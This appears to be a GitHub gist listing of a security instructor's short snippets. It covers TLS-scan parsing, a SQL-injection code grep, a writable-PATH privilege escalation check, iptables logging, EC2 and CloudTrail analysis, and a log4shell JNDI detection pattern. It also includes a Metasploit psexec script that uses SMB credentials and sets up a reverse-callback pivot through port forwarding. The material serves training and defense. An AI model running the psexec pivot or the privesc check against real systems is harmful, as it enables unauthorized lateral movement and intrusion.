Skip to content

Instantly share code, notes, and snippets.

View joswr1ght's full-sized avatar

Joshua Wright joswr1ght

458 followers · 23 following
View GitHub Profile
@joswr1ght
joswr1ght / extract-tlsscan-hostnames.py
Last active October 18, 2025 02:58
Extract TLS-Scan Hostnames from Certificate Records
#!/usr/bin/env python3
# Mark Baggett @MarkBaggett graciously wrote this script.
# Minor changes by Joshua Wright @joswr1ght.
# Use it to retrieve host name information from the JSON output of tls-scan
# (https://github.com/prbinu/tls-scan) in the subjectCN and subjectAltName
# fields.
import json
import re
import sys
@joswr1ght
joswr1ght / heinous-shell-sqli-scanner.sh
Created March 16, 2021 18:55
SQL Injection Vulnerable Code Scanning Shell Command
# This heinous command searches for SQL injection vulnerable code:
# 1. Use awk to convert multiline strings into a single line
# 2. Fix things up with sed to make line endings normal again
# 3. Search for SQL-related statements
# 4. Search for lines where there are two or more $ variable indicators
#
# This is a hack. Please don't let this be my legacy.
#
awk -F"\"" '!$NF{ print; next }{ printf("%s ", $0) }' *.php | sed 's/;/;\n/g;s/}/}\n/g' | grep -iE "select|insert|update|delete" | grep -E "\\$.*\\$"
@joswr1ght
joswr1ght / check-privesc-writable-dirs.sh
Created March 31, 2021 14:31
Check PATH for Writable Directories for Privesc Opportunity
IFS=:; set -o noglob; for dir in $PATH""; do ls -ld $dir; done
@joswr1ght
joswr1ght / iptables-connect-logging.sh
Created May 10, 2021 11:18
Linux server-side connection logging
# Create a chain that logs new connections:
iptables -N LOGNEW
iptables -A LOGNEW -j LOG --log-prefix ' INBOUND TCP ' --log-level 4
iptables -A LOGNEW -j ACCEPT
# Accept packets on existing connections without any fuss:
iptables -A INPUT -p tcp -m state \! --state NEW -j ACCEPT
# Log incoming packets on new connections:
iptables -A INPUT -p tcp -j LOGNEW -m limit --limit 100/sec
# Examine logs
@joswr1ght
joswr1ght / intermediate-forwarder.met
Created May 21, 2021 16:36
Setup Intermediate Forwarder for Metasploit Callback
use exploit/windows/smb/psexec
set RHOST 10.10.10.10
set SMBUSER falken
set SMBPASS joshua
set LHOST tap0
show options
exploit
portfwd add -R -L 127.0.0.1 -l 4444 -p 4444
bg
route add 10.10.10.20/32 1
@joswr1ght
joswr1ght / youwillnotbestmejq.sh
Last active July 29, 2021 18:54
Get Name and IP address from EC2 instances
$ aws --profile falsimentis --region us-west-1 ec2 describe-instances | jq -jr '.Reservations[] | .Instances[] | "\"", (.PublicIpAddress), "\":\"", (.Tags[] | select(.Key=="Name")|.Value),"\",\n"'
"54.183.200.32":"Web Server 3",
"13.56.160.248":"VPC NAT Backup",
"13.57.148.101":"VPC NAT",
"54.153.36.229":"Dev Webserver",
"52.52.159.114":"Web Server 2",
"null":"DB Server 1",
"54.241.78.206":"Web Server 1",
"54.219.245.27":"Web Server 4",
$ cat ec2-describe-instances.json | jq -jr '.Reservations[] | .Instances[] | "\"", (.NetworkInterfaces[] | .PrivateIpAddress), "\":\"", (.Tags[] | select(.Key=="Name")|.Value),"\",\n"'
@joswr1ght
joswr1ght / ctsummarize.sh
Created November 10, 2021 14:08
ctsummarize: Create Multiple Output Files From CloudTrail Activity for Analysis
#!/bin/bash
REQUIREDUTILS="jq zcat mktemp sort uniq rm"
# Run program and test exit status to ensure success
function runtst {
"$@"
local status=$?
if (( status != 0 )); then
echo "error running command" >&2
@joswr1ght
joswr1ght / HELP.md
Last active November 25, 2022 18:32
Log4Jack Bonus Help

Yule Log4Jack Help

Hi, Josh Wright here. I'm the technical director for the Holiday Hack Challenge. We don't normally break the 4th wall like this, but we think this Log4j vulnerability calls for special measures to give you the information you need to assess, identify, and mitigate this vulnerability.

In this challenge, Icky McGoop asks for your help in exploiting a Java Solr server at http://solrpower.kringlecastle.com:8983. This server is vulnerable to the Log4shell vulnerability. Your goal is to exploit the server and get a

@joswr1ght
joswr1ght / logshell-search.sh
Created December 20, 2021 19:56
Search for log4shell attack patterns
#!/bin/sh
# Specify a starting directory as the first command-line argument to search for
# log4shell-style attack patterns.
grep -E -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' $1
@joswr1ght
joswr1ght / mifare-desfire-aid-mapping.md
Last active February 24, 2022 20:02
MIFARE DESFire AID Mapping

MIFARE DESFire AID Mapping

Entered here for prosperity and so I don't have to search for this ever again.

The MIFARE DESFire Application Identifier (AID) is a 3-byte value that represents the application ID used for RFID functionality that holds files. This can be a MIFARE Classic AID structure (2 bytes) adapted for use with the expanded MIFARE DESFire AID (3 bytes).

https://www.nxp.com/docs/en/application-note/AN10787.pdf

A 2-byte MIFARE Classic AID adapted to MIFARE DESFire uses a leading nibble of 0xf and a trailing nibble of 0x0 - 0xf. The middle 2 bytes are the MIFARE Classic AID. ex., 0x7009 is the Timelox AB MIFARE Classic AID; 0xf7009x is the adapted AID for MIFARE DESFire.